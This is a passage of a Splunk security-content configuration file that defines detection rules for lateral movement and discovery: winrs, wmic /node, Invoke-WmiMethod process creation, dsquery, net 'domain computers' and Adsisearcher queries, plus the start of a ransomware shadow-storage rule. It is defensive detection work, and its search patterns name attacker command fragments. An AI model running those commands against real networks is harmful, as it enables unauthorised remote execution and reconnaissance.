remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may leverage WinRM and WinRs to start a process on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-11 action.escu.modification_date = 2021-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and Winrs - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and Winrs - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WinRM and Winrs action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=winrs.exe OR Processes.original_file_name=winrs.exe) (Processes.process="*-r:*" OR Processes.process="*-remote:*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_winrs_filter` [ESCU - Remote Process Instantiation via WMI - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The wmic.exe utility is a benign Windows application. It may be used legitimately by Administrators with these parameters for remote system administration, but it's relatively uncommon. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Active Directory Lateral Movement", "Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = A wmic.exe process $process$ contain process spawn commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Active Directory Lateral Movement", "Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WMI action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process="*/node:*" AND Processes.process="*process*" AND Processes.process="*call*" AND Processes.process="*create*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_filter` [ESCU - Remote Process Instantiation via WMI and PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may leverage WWMI and powershell.exe to start a process on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-15 action.escu.modification_date = 2021-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI and PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $dest by abusing WMI using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI and PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WMI and PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-WmiMethod*" AND Processes.process="*-CN*" AND Processes.process="*-Class Win32_Process*" AND Processes.process="*-Name create*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_and_powershell_filter` [ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators may leverage WWMI and powershell.exe to start a process on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2022-11-15 action.escu.modification_date = 2022-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing WMI using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI and PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Invoke-WmiMethod` commandlet with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and this commandlet for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WMI and PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText="*Invoke-WmiMethod*" AND (ScriptBlockText="*-CN*" OR ScriptBlockText="*-ComputerName*") AND ScriptBlockText="*-Class Win32_Process*" AND ScriptBlockText="*-Name create*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_and_powershell_script_block_filter` [ESCU - Remote System Discovery with Adsisearcher - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use Adsisearcher for troubleshooting. action.escu.creation_date = 2022-06-29 action.escu.modification_date = 2022-06-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote System Discovery with Adsisearcher - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery enumeration on $Computer$ by $user$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote System Discovery with Adsisearcher - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain computers. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain computers for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Remote System Discovery with Adsisearcher action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*adsisearcher*" AND ScriptBlockText = "*objectcategory=computer*" AND ScriptBlockText IN ("*findAll()*","*findOne()*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `remote_system_discovery_with_adsisearcher_filter` [ESCU - Remote System Discovery with Dsquery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover remote systems. The `computer` argument returns a list of all computers registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover remote systems. The `computer` argument returns a list of all computers registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-31 action.escu.modification_date = 2021-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote System Discovery with Dsquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote System Discovery with Dsquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe") (Processes.process="*computer*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_dsquery_filter` [ESCU - Remote System Discovery with Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to discover remote systems. The argument `domain computers /domain` returns a list of all domain computers. Red Teams and adversaries alike use net.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to discover remote systems. The argument `domain computers /domain` returns a list of all domain computers. Red Teams and adversaries alike use net.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-30 action.escu.modification_date = 2021-08-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote System Discovery with Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote System Discovery with Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process="*domain computers*" AND Processes.process=*/do*) OR (Processes.process="*view*" AND Processes.process=*/do*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_net_filter` [ESCU - Remote System Discovery with Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote System Discovery with Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote System Discovery with Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command return a list of all the systems registered in the domain. Red Teams and adversaries alike may leverage WMI and wmic.exe to identify remote systems for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Remote System Discovery with Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_computer* AND Processes.process="*GET ds_samaccountname*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_system_discovery_with_wmic_filter` [ESCU - Remote WMI Command Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. Contain and isolate the endpoint as needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. Contain and isolate the endpoint as needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may use this legitimately to gather info from remote systems. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote WMI Command Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Graceful Wipe Out Attack", "Volt Typhoon", "Living Off The Land", "IcedID", "Suspicious WMI Use", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A wmic.exe process $process$ contain node commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote WMI Command Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["Graceful Wipe Out Attack", "Volt Typhoon", "Living Off The Land", "IcedID", "Suspicious WMI Use", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies usage of `wmic.exe` spawning a local or remote process, identified by the `node` switch. During triage, review parallel processes for additional commands executed. Look for any file modifications before and after `wmic.exe` execution. In addition, identify the remote endpoint and confirm execution or file modifications. Contain and isolate the endpoint as needed. action.notable.param.rule_title = Remote WMI Command Attempt action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process=*node* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_wmi_command_attempt_filter` [ESCU - Resize ShadowStorage volume - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytics identifies the resizing of shadowstorage by ransomware malware to avoid the shadow volumes being made again. this technique is an alternative by ransomware attacker than deleting the shadowstorage which is known alert in defensive team. one example of ransomware that use this technique is CLOP ransomware where it drops a .bat file that will resize the shadowstorage to minimum size as much as possible action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytics identifies the resizing of shadowstorage by ransomware malware to avoid the shadow volumes being made again. this technique is an alternative by ransomware attacker than deleting the shadowstorage which is known alert in defensive team. one example of ransomware that use this technique is CLOP ransomware where it drops a .bat file that will resize the shadowstorage to minimum size as much as possible action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling 